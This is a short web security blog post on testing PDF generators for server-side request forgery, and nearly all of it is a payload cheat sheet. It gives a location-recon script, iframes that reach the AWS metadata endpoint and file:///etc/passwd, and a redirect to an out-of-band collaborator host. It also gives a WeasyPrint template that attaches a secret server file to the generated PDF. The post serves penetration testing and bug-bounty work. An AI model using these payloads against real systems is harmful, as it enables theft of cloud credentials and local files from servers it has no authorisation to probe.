Skip to content

Testing for SSRF during PDF Generation

https://unsplash.com/photos/QvU0LNnr26U

How to test for SSRF during PDF Generation?

User input is reflected in the PDF.

HTML elements are parsed by the PDF Generator Libraries.

Research the specific types of data that can be parsed by the target’s PDF Generator Library in order to generate a payload

Payloads

If HTML is parsed directly:

Recon

<script>
  document.write(window.location.href); 
  document.write(window.location.hostname); 
  document.write(window.location.pathname); 
  document.write(window.location.protocol); 
  document.write(window.location.host); 
  document.write(window.location.port); 
</script>

Redirect with iframe

<iframe+src="http://localhost/?redirect=http://xxxx.burpcollaborator.net/x.png">

AWS

<iframe src="http://169.254.169.254/user-data">

Files

<iframe src="file:///etc/passwd">

WeasyPrint PDF Test

Trying to embed a secret file in the PDF? You can try this payload if the target is parsing a HTML page. One thing that you can do is host the index html file in Heroku etc. and pass it to the target’s PDF generation endpoint.

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>WeasyPrint PDF Test</title>
    <link rel=attachment href="file:///{path_to_secret_file}">
</head>
<body>
    <h1>WeasyPrint PDF Test</h1>
</body>
</html>

In the PDF reader, open up the Attachment section and view the embedded file.

Resources

https://media.defcon.org/DEF%20CON%2027/DEF%20CON%2027%20presentations/DEFCON-27-Ben-Sadeghipour-Owning-the-clout-through-SSRF-and-PDF-generators.pdf

Published inVulnerability InfoWeb Security

Be First to Comment

Leave a Reply

Your email address will not be published.